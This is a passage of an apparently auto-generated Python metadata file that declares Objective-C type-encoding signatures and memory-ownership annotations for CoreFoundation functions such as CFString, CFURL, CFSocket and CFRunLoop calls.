"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFAttributedStringSetAttributes": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFDictionary=}Z",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFDictionary=}Z",
),
),
"CFNumberFormatterCopyProperty": (
b"@^{__CFNumberFormatter=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFSocketGetTypeID": (sel32or64(b"L", b"Q"),),
"CFURLGetBaseURL": (b"^{__CFURL=}^{__CFURL=}",),
"CFSetGetCountOfValue": (sel32or64(b"l^{__CFSet=}@", b"q^{__CFSet=}@"),),
"CFWriteStreamSetProperty": (b"Z^{__CFWriteStream=}^{__CFString=}@",),
"CFDictionarySetValue": (b"v^{__CFDictionary=}@@",),
"CFRunLoopSourceGetTypeID": (sel32or64(b"L", b"Q"),),
"CFWriteStreamCopyError": (
b"^{__CFError=}^{__CFWriteStream=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorSetBits": (
sel32or64(
b"v^{__CFBitVector=}{_CFRange=ll}L", b"v^{__CFBitVector=}{_CFRange=qq}I"
),
),
"CFURLCreateBookmarkDataFromAliasRecord": (
b"^{__CFData=}^{__CFAllocator=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringRemoveAttribute": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFString=}",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFString=}",
),
),
"CFURLCreateFromFSRef": (
b"^{__CFURL=}^{__CFAllocator=}^{FSRef=[80C]}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "n"}},
},
),
"CFBitVectorFlipBits": (
sel32or64(
b"v^{__CFBitVector=}{_CFRange=ll}", b"v^{__CFBitVector=}{_CFRange=qq}"
),
),
"CFCalendarCopyCurrent": (
b"^{__CFCalendar=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopAddObserver": (b"v^{__CFRunLoop=}^{__CFRunLoopObserver=}^{__CFString=}",),
"CFURLCreateCopyDeletingPathExtension": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFMessagePortIsValid": (b"Z^{__CFMessagePort=}",),
"CFBundleCopySupportFilesDirectoryURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberGetType": (sel32or64(b"l^{__CFNumber=}", b"q^{__CFNumber=}"),),
"CFDataCreateCopy": (
b"^{__CFData=}^{__CFAllocator=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDictionaryCreateMutableCopy": (
sel32or64(
b"^{__CFDictionary=}^{__CFAllocator=}l^{__CFDictionary=}",
b"^{__CFDictionary=}^{__CFAllocator=}q^{__CFDictionary=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringConvertEncodingToNSStringEncoding": (sel32or64(b"LL", b"QI"),),
"CFXMLParserGetSourceURL": (b"^{__CFURL=}^{__CFXMLParser=}",),
"CFSetContainsValue": (b"Z^{__CFSet=}@",),
"CFBundleCopyInfoDictionaryForURL": (
b"^{__CFDictionary=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFMessagePortSetInvalidationCallBack": (
b"v^{__CFMessagePort=}^?",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFMessagePort=}"},
1: {"type": b"^v"},
},
}
}
}
},
),
"CFTreeRemoveAllChildren": (b"v^{__CFTree=}",),
"CFFileDescriptorIsValid": (b"Z^{__CFFileDescriptor=}",),
"CFSetGetValueIfPresent": (
b"Z^{__CFSet=}@^@",
"",
{"arguments": {2: {"type_modifier": "o"}}},
),
"CFBinaryHeapGetCount": (
sel32or64(b"l^{__CFBinaryHeap=}", b"q^{__CFBinaryHeap=}"),
),
"CFRunLoopContainsObserver": (
b"Z^{__CFRunLoop=}^{__CFRunLoopObserver=}^{__CFString=}",
),
"CFRunLoopObserverGetOrder": (
sel32or64(b"l^{__CFRunLoopObserver=}", b"q^{__CFRunLoopObserver=}"),
),
"CFBagReplaceValue": (b"v^{__CFBag=}@",),
"CFTreeSetContext": (
sel32or64(
b"v^{__CFTree=}^{_CFTreeContext=l^v^?^?^?}",
b"v^{__CFTree=}^{_CFTreeContext=q^v^?^?^?}",
),
),
"CFReadStreamCopyProperty": (
b"@^{__CFReadStream=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringIsHyphenationAvailableForLocale": (b"Z^{__CFLocale=}",),
"CFWriteStreamCopyDispatchQueue": (
sel32or64(b"^{dispatch_queue_s=}^{__CFWriteStream=}", b"@^{__CFWriteStream=}"),
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopSourceCreate": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}l^{_CFRunLoopSourceContext=l^v^?^?^?^?^?^?^?^?}",
b"^{__CFRunLoopSource=}^{__CFAllocator=}q^{_CFRunLoopSourceContext=q^v^?^?^?^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetInvert": (b"v^{__CFCharacterSet=}",),
"CFMachPortInvalidate": (b"v^{__CFMachPort=}",),
"CFSwapInt32BigToHost": (b"II",),
"CFDataReplaceBytes": (
sel32or64(b"v^{__CFData=}{_CFRange=ll}^vl", b"v^{__CFData=}{_CFRange=qq}^vq"),
"",
{"arguments": {2: {"c_array_length_in_arg": 3, "type_modifier": "n"}}},
),
"CFDataGetBytePtr": (
b"^v^{__CFData=}",
"",
{"retval": {"c_array_of_variable_length": True}},
),
"CFSocketDisableCallBacks": (sel32or64(b"v^{__CFSocket=}L", b"v^{__CFSocket=}Q"),),
"CFBundleCopyLocalizationsForURL": (
b"^{__CFArray=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFReadStreamGetBuffer": (
sel32or64(b"^v^{__CFReadStream=}l^l", b"^v^{__CFReadStream=}q^q"),
"",
{
"retval": {"c_array_length_in_arg": 2},
"arguments": {2: {"type_modifier": "o"}},
},
),
"CFErrorGetDomain": (b"^{__CFString=}^{__CFError=}",),
"CFStringHasPrefix": (b"Z^{__CFString=}^{__CFString=}",),
"CFTimeZoneIsDaylightSavingTime": (b"Z^{__CFTimeZone=}d",),
"CFWriteStreamCanAcceptBytes": (b"Z^{__CFWriteStream=}",),
"CFWriteStreamOpen": (b"Z^{__CFWriteStream=}",),
"CFBitVectorSetCount": (sel32or64(b"v^{__CFBitVector=}l", b"v^{__CFBitVector=}q"),),
"CFErrorCreateWithUserInfoKeysAndValues": (
sel32or64(
b"^{__CFError=}^{__CFAllocator=}^{__CFString=}l^@^@l",
b"^{__CFError=}^{__CFAllocator=}^{__CFString=}q^@^@q",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {"c_array_length_in_arg": 5, "type_modifier": "n"},
4: {"c_array_length_in_arg": 5, "type_modifier": "n"},
},
},
),
"CFUserNotificationCreate": (
sel32or64(
b"^{__CFUserNotification=}^{__CFAllocator=}dL^l^{__CFDictionary=}",
b"^{__CFUserNotification=}^{__CFAllocator=}dQ^i^{__CFDictionary=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "o"}},
},
),
"CFURLResourceIsReachable": (
b"Z^{__CFURL=}^^{__CFError=}",
"",
{
"arguments": {
1: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFStringIsSurrogateHighCharacter": (b"ZT",),
"CFPropertyListCreateWithData": (
sel32or64(
b"@^{__CFAllocator=}^{__CFData=}L^l^^{__CFError=}",
b"@^{__CFAllocator=}^{__CFData=}Q^q^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {"type_modifier": "o"},
4: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
},
},
),
"CFSocketGetDefaultNameRegistryPortNumber": (b"S",),
"CFBundleCopyLocalizationsForPreferences": (
b"^{__CFArray=}^{__CFArray=}^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopObserverInvalidate": (b"v^{__CFRunLoopObserver=}",),
"CFURLGetFSRef": (
b"Z^{__CFURL=}^{FSRef=[80C]}",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFURLCreateCopyDeletingLastPathComponent": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCreateBundlesFromDirectory": (
b"^{__CFArray=}^{__CFAllocator=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringFindCharacterFromSet": (
sel32or64(
b"Z^{__CFString=}^{__CFCharacterSet=}{_CFRange=ll}L^{_CFRange=ll}",
b"Z^{__CFString=}^{__CFCharacterSet=}{_CFRange=qq}Q^{_CFRange=qq}",
),
"",
{"arguments": {4: {"type_modifier": "o"}}},
),
"CFAttributedStringCreateMutable": (
sel32or64(
b"^{__CFAttributedString=}^{__CFAllocator=}l",
b"^{__CFAttributedString=}^{__CFAllocator=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFTreeGetContext": (
sel32or64(
b"v^{__CFTree=}^{_CFTreeContext=l^v^?^?^?}",
b"v^{__CFTree=}^{_CFTreeContext=q^v^?^?^?}",
),
),
"CFArrayCreateMutable": (
sel32or64(
b"^{__CFArray=}^{__CFAllocator=}l^{_CFArrayCallBacks=l^?^?^?^?}",
b"^{__CFArray=}^{__CFAllocator=}q^{_CFArrayCallBacks=q^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFShow": (b"v@",),
"CFFileSecuritySetOwner": (b"Z^{__CFFileSecurity=}I",),
"CFSocketCopyAddress": (
b"^{__CFData=}^{__CFSocket=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBagGetValues": (
b"v^{__CFBag=}^@",
"",
{"arguments": {1: {"c_array_of_variable_length": True, "type_modifier": "o"}}},
),
"CFFileSecuritySetOwnerUUID": (b"Z^{__CFFileSecurity=}^{__CFUUID=}",),
"CFLocaleCreateCanonicalLocaleIdentifierFromScriptManagerCodes": (
b"^{__CFString=}^{__CFAllocator=}ss",
"",
{"retval": {"already_cfretained": True}},
),
"CFDictionaryRemoveValue": (b"v^{__CFDictionary=}@",),
"CFWriteStreamSetClient": (
sel32or64(
b"Z^{__CFWriteStream=}L^?^{_CFStreamClientContext=l^v^?^?^?}",
b"Z^{__CFWriteStream=}Q^?^{_CFStreamClientContext=q^v^?^?^?}",
),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFWriteStream=}"},
1: {"type": b"Q"},
2: {"type": b"^v"},
},
}
}
}
},
),
"CFRunLoopSourceIsValid": (b"Z^{__CFRunLoopSource=}",),
"CFCharacterSetIsCharacterMember": (b"Z^{__CFCharacterSet=}T",),
"CFTreeGetChildCount": (sel32or64(b"l^{__CFTree=}", b"q^{__CFTree=}"),),
"CFURLSetTemporaryResourcePropertyForKey": (b"v^{__CFURL=}^{__CFString=}@",),
"CFConvertDoubleHostToSwapped": (b"{_CFSwappedFloat64=Q}d",),
"CFSetGetValue": (b"@^{__CFSet=}@",),
"CFMessagePortSendRequest": (
sel32or64(
b"l^{__CFMessagePort=}l^{__CFData=}dd^{__CFString=}^^{__CFData=}",
b"i^{__CFMessagePort=}i^{__CFData=}dd^{__CFString=}^^{__CFData=}",
),
"",
{"arguments": {6: {"type_modifier": "o"}}},
),
"CFUUIDGetConstantUUIDWithBytes": (
b"^{__CFUUID=}^{__CFAllocator=}CCCCCCCCCCCCCCCC",
),
"CFSocketCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFSocket=}l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFSocket=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamCreateWithBuffer": (
sel32or64(
b"^{__CFWriteStream=}^{__CFAllocator=}^vl",
b"^{__CFWriteStream=}^{__CFAllocator=}^vq",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFXMLTreeCreateXMLData": (
b"^{__CFData=}^{__CFAllocator=}^{__CFTree=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCopyUserName": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCopyAbsoluteURL": (
b"^{__CFURL=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFNumberGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringCompareWithOptions": (
sel32or64(
b"l^{__CFString=}^{__CFString=}{_CFRange=ll}L",
b"q^{__CFString=}^{__CFString=}{_CFRange=qq}Q",
),
),
"CFWriteStreamGetTypeID": (sel32or64(b"L", b"Q"),),
"CFSwapInt16": (b"SS",),
"CFDateGetTimeIntervalSinceDate": (b"d^{__CFDate=}^{__CFDate=}",),
"CFAttributedStringGetString": (b"^{__CFString=}^{__CFAttributedString=}",),
"CFURLCopyNetLocation": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringFind": (
sel32or64(
b"{_CFRange=ll}^{__CFString=}^{__CFString=}L",
b"{_CFRange=qq}^{__CFString=}^{__CFString=}Q",
),
),
"CFConvertFloat64HostToSwapped": (b"{_CFSwappedFloat64=Q}d",),
"CFSetReplaceValue": (b"v^{__CFSet=}@",),
"CFURLCreateCopyAppendingPathExtension": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFTimeZoneCreate": (
b"^{__CFTimeZone=}^{__CFAllocator=}^{__CFString=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCopyScheme": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLParserParse": (b"Z^{__CFXMLParser=}",),
"CFRunLoopRemoveTimer": (b"v^{__CFRunLoop=}^{__CFRunLoopTimer=}^{__CFString=}",),
"CFPreferencesAppValueIsForced": (b"Z^{__CFString=}^{__CFString=}",),
"CFSocketCreate": (
sel32or64(
b"^{__CFSocket=}^{__CFAllocator=}lllL^?^{_CFSocketContext=l^v^?^?^?}",
b"^{__CFSocket=}^{__CFAllocator=}iiiQ^?^{_CFSocketContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFSocket=}"},
1: {"type": b"Q"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
4: {"type": b"^v"},
},
}
}
},
},
),
"CFNotificationCenterGetTypeID": (sel32or64(b"L", b"Q"),),
"CFURLCreateStringByReplacingPercentEscapes": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorContainsBit": (
sel32or64(
b"Z^{__CFBitVector=}{_CFRange=ll}L", b"Z^{__CFBitVector=}{_CFRange=qq}I"
),
),
"CFMachPortCreateWithPort": (
sel32or64(
b"^{__CFMachPort=}^{__CFAllocator=}I^?^{_CFMachPortContext=l^v^?^?^?}^Z",
b"^{__CFMachPort=}^{__CFAllocator=}I^?^{_CFMachPortContext=q^v^?^?^?}^Z",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFMachPort=}"},
1: {"type": b"^v"},
2: {"type": b"q"},
3: {"type": b"^v"},
},
}
}
},
},
),
"CFPreferencesAppSynchronize": (b"Z^{__CFString=}",),
"CFFileDescriptorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopyBundleLocalizations": (
b"^{__CFArray=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFFileSecurityCreate": (
b"^{__CFFileSecurity=}^{__CFAllocator=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFHash": (sel32or64(b"L@", b"Q@"),),
"CFCharacterSetIntersect": (b"v^{__CFCharacterSet=}^{__CFCharacterSet=}",),
"CFXMLNodeCreateCopy": (
b"^{__CFXMLNode=}^{__CFAllocator=}^{__CFXMLNode=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayCreate": (
sel32or64(
b"^{__CFArray=}^{__CFAllocator=}^^vl^{_CFArrayCallBacks=l^?^?^?^?}",
b"^{__CFArray=}^{__CFAllocator=}^^vq^{_CFArrayCallBacks=q^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBooleanGetValue": (b"Z^{__CFBoolean=}",),
"CFArrayContainsValue": (
sel32or64(b"Z^{__CFArray=}{_CFRange=ll}@", b"Z^{__CFArray=}{_CFRange=qq}@"),
),
"CFSwapInt32HostToBig": (b"II",),
"CFURLWriteDataAndPropertiesToResource": (
sel32or64(
b"Z^{__CFURL=}^{__CFData=}^{__CFDictionary=}^l",
b"Z^{__CFURL=}^{__CFData=}^{__CFDictionary=}^i",
),
"",
{"arguments": {3: {"type_modifier": "o"}}},
),
"CFArrayInsertValueAtIndex": (sel32or64(b"v^{__CFArray=}l@", b"v^{__CFArray=}q@"),),
"CFDictionaryCreateMutable": (
sel32or64(
b"^{__CFDictionary=}^{__CFAllocator=}l^{_CFDictionaryKeyCallBacks=l^?^?^?^?^?}^{_CFDictionaryValueCallBacks=l^?^?^?^?}",
b"^{__CFDictionary=}^{__CFAllocator=}q^{_CFDictionaryKeyCallBacks=q^?^?^?^?^?}^{_CFDictionaryValueCallBacks=q^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFAllocatorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFReadStreamRead": (
sel32or64(b"l^{__CFReadStream=}^vl", b"q^{__CFReadStream=}^vq"),
"",
{
"arguments": {
1: {
"c_array_length_in_result": True,
"type_modifier": "o",
"c_array_length_in_arg": 2,
}
}
},
),
"CFDataGetBytes": (
sel32or64(b"v^{__CFData=}{_CFRange=ll}^v", b"v^{__CFData=}{_CFRange=qq}^v"),
"",
{"arguments": {2: {"c_array_length_in_arg": 1, "type_modifier": "o"}}},
),
"CFStringCreateWithCharactersNoCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^Tl^{__CFAllocator=}",
b"^{__CFString=}^{__CFAllocator=}^Tq^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFStringGetLongCharacterForSurrogatePair": (sel32or64(b"LTT", b"ITT"),),
"CFSetAddValue": (b"v^{__CFSet=}@",),
"CFFileSecuritySetMode": (b"Z^{__CFFileSecurity=}S",),
"CFURLCreateStringByAddingPercentEscapes": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}^{__CFString=}L",
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFString=}^{__CFString=}I",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetIntValue": (sel32or64(b"l^{__CFString=}", b"i^{__CFString=}"),),
"CFDictionaryGetCountOfValue": (
sel32or64(b"l^{__CFDictionary=}@", b"q^{__CFDictionary=}@"),
),
"CFDataGetMutableBytePtr": (
b"^v^{__CFData=}",
"",
{"retval": {"c_array_of_variable_length": True}},
),
"CFURLCreateAbsoluteURLWithBytes": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^vlL^{__CFURL=}Z",
b"^{__CFURL=}^{__CFAllocator=}^vqI^{__CFURL=}Z",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFBundleOpenBundleResourceFiles": (
sel32or64(b"l^{__CFBundle=}^s^s", b"i^{__CFBundle=}^i^i"),
"",
{"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}}},
),
"CFRunLoopTimerGetInterval": (b"d^{__CFRunLoopTimer=}",),
"CFFileSecurityGetOwner": (
b"Z^{__CFFileSecurity=}^I",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFCalendarGetIdentifier": (b"^{__CFString=}^{__CFCalendar=}",),
"CFStringCompare": (
sel32or64(b"l^{__CFString=}^{__CFString=}L", b"q^{__CFString=}^{__CFString=}Q"),
),
"CFURLClearResourcePropertyCache": (b"v^{__CFURL=}",),
"CFRunLoopSourceInvalidate": (b"v^{__CFRunLoopSource=}",),
"CFCalendarCreateWithIdentifier": (
b"^{__CFCalendar=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFMachPortGetPort": (b"I^{__CFMachPort=}",),
"CFBinaryHeapRemoveMinimumValue": (b"v^{__CFBinaryHeap=}",),
"CFBagRemoveValue": (b"v^{__CFBag=}@",),
"CFStringReplaceAll": (b"v^{__CFString=}^{__CFString=}",),
"CFArraySetValueAtIndex": (sel32or64(b"v^{__CFArray=}l@", b"v^{__CFArray=}q@"),),
"CFBundleCopyExecutableArchitecturesForURL": (
b"^{__CFArray=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopObserverDoesRepeat": (b"Z^{__CFRunLoopObserver=}",),
"CFDateCompare": (
sel32or64(b"l^{__CFDate=}^{__CFDate=}^v", b"q^{__CFDate=}^{__CFDate=}^v"),
),
"CFGregorianDateIsValid": (
sel32or64(b"Z{_CFGregorianDate=lccccd}L", b"Z{_CFGregorianDate=iccccd}Q"),
),
"CFAutorelease": (b"@@",),
"CFRunLoopTimerInvalidate": (b"v^{__CFRunLoopTimer=}",),
"CFDictionaryGetCountOfKey": (
sel32or64(b"l^{__CFDictionary=}@", b"q^{__CFDictionary=}@"),
),
"CFStringGetCharacterAtIndex": (
sel32or64(b"T^{__CFString=}l", b"T^{__CFString=}q"),
),
"CFStringCreateWithCString": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^tL", b"^{__CFString=}^{__CFAllocator=}^tI"
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_delimited_by_null": True, "type_modifier": "n"}},
},
),
"CFReadStreamCopyError": (
b"^{__CFError=}^{__CFReadStream=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFUserNotificationCheckBoxChecked": (sel32or64(b"Ll", b"Qq"),),
"CFAttributedStringCreate": (
b"^{__CFAttributedString=}^{__CFAllocator=}^{__CFString=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringFindWithOptions": (
sel32or64(
b"Z^{__CFString=}^{__CFString=}{_CFRange=ll}L^{_CFRange=ll}",
b"Z^{__CFString=}^{__CFString=}{_CFRange=qq}Q^{_CFRange=qq}",
),
"",
{"arguments": {4: {"type_modifier": "o"}}},
),
"CFSetRemoveAllValues": (b"v^{__CFSet=}",),
"CFArraySortValues": (
sel32or64(b"v^{__CFArray=}{_CFRange=ll}^?@", b"v^{__CFArray=}{_CFRange=qq}^?@"),
"",
{
"arguments": {
2: {
"callable": {
"retval": {"type": b"l"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
},
},
"callable_retained": False,
}
}
},
),
"CFCalendarGetFirstWeekday": (
sel32or64(b"l^{__CFCalendar=}", b"q^{__CFCalendar=}"),
),
"CFStreamCreatePairWithPeerSocketSignature": (
sel32or64(
b"v^{__CFAllocator=}^{_CFSocketSignature=lll^{__CFData=}}^^{__CFReadStream=}^^{__CFWriteStream=}",
b"v^{__CFAllocator=}^{_CFSocketSignature=iii^{__CFData=}}^^{__CFReadStream=}^^{__CFWriteStream=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
1: {"type_modifier": "n"},
2: {"type_modifier": "o"},
3: {"type_modifier": "o"},
},
},
),
"CFURLSetResourcePropertiesForKeys": (
b"Z^{__CFURL=}^{__CFDictionary=}^^{__CFError=}",
"",
{
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFXMLParserGetLocation": (
sel32or64(b"l^{__CFXMLParser=}", b"q^{__CFXMLParser=}"),
),
"CFStringTokenizerGetCurrentTokenRange": (
sel32or64(
b"{_CFRange=ll}^{__CFStringTokenizer=}",
b"{_CFRange=qq}^{__CFStringTokenizer=}",
),
),
"CFBagContainsValue": (b"Z^{__CFBag=}@",),
"CFUUIDCreateWithBytes": (
b"^{__CFUUID=}^{__CFAllocator=}CCCCCCCCCCCCCCCC",
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayGetCount": (sel32or64(b"l^{__CFArray=}", b"q^{__CFArray=}"),),
"CFArrayCreateMutableCopy": (
sel32or64(
b"^{__CFArray=}^{__CFAllocator=}l^{__CFArray=}",
b"^{__CFArray=}^{__CFAllocator=}q^{__CFArray=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFSetSetValue": (b"v^{__CFSet=}@",),
"CFSwapInt64HostToBig": (b"QQ",),
"CFCharacterSetUnion": (b"v^{__CFCharacterSet=}^{__CFCharacterSet=}",),
"CFFileSecurityCopyGroupUUID": (
b"Z^{__CFFileSecurity=}^^{__CFUUID=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "o"}},
},
),
"CFAttributedStringSetAttribute": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFString=}@",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFString=}@",
),
),
"CFReadStreamOpen": (b"Z^{__CFReadStream=}",),
"CFXMLNodeGetVersion": (sel32or64(b"l^{__CFXMLNode=}", b"q^{__CFXMLNode=}"),),
"CFStringCreateWithBytesNoCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^tlLZ^{__CFAllocator=}",
b"^{__CFString=}^{__CFAllocator=}^tqIZ^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFBundleGetTypeID": (sel32or64(b"L", b"Q"),),
"CFURLDestroyResource": (
sel32or64(b"Z^{__CFURL=}^l", b"Z^{__CFURL=}^i"),
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFBagSetValue": (b"v^{__CFBag=}@",),
"CFURLWriteBookmarkDataToFile": (
sel32or64(
b"Z^{__CFData=}^{__CFURL=}L^^{__CFError=}",
b"Z^{__CFData=}^{__CFURL=}Q^^{__CFError=}",
),
"",
{
"arguments": {
3: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFFileDescriptorCreateRunLoopSource": (
sel32or64(
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFFileDescriptor=}l",
b"^{__CFRunLoopSource=}^{__CFAllocator=}^{__CFFileDescriptor=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFGetTypeID": (sel32or64(b"L@", b"Q@"),),
"CFURLCopyFragment": (
b"^{__CFString=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFWriteStreamCreateWithFile": (
b"^{__CFWriteStream=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAbsoluteTimeGetDifferenceAsGregorianUnits": (
sel32or64(
b"{_CFGregorianUnits=llllld}dd^{__CFTimeZone=}L",
b"{_CFGregorianUnits=iiiiid}dd^{__CFTimeZone=}Q",
),
),
"CFReadStreamCreateWithFile": (
b"^{__CFReadStream=}^{__CFAllocator=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyLocalizedString": (
b"^{__CFString=}^{__CFBundle=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFErrorCopyRecoverySuggestion": (
b"^{__CFString=}^{__CFError=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateBookmarkData": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}L^{__CFArray=}^{__CFURL=}^^{__CFError=}",
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}Q^{__CFArray=}^{__CFURL=}^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFStringCreateWithBytes": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^tlLZ",
b"^{__CFString=}^{__CFAllocator=}^tqIZ",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFRunLoopSourceGetOrder": (
sel32or64(b"l^{__CFRunLoopSource=}", b"q^{__CFRunLoopSource=}"),
),
"CFBundleLoadExecutable": (b"Z^{__CFBundle=}",),
"CFStringCreateCopy": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLCreateFilePathURL": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFUserNotificationDisplayNotice": (
sel32or64(
b"ldL^{__CFURL=}^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}",
b"idQ^{__CFURL=}^{__CFURL=}^{__CFURL=}^{__CFString=}^{__CFString=}^{__CFString=}",
),
),
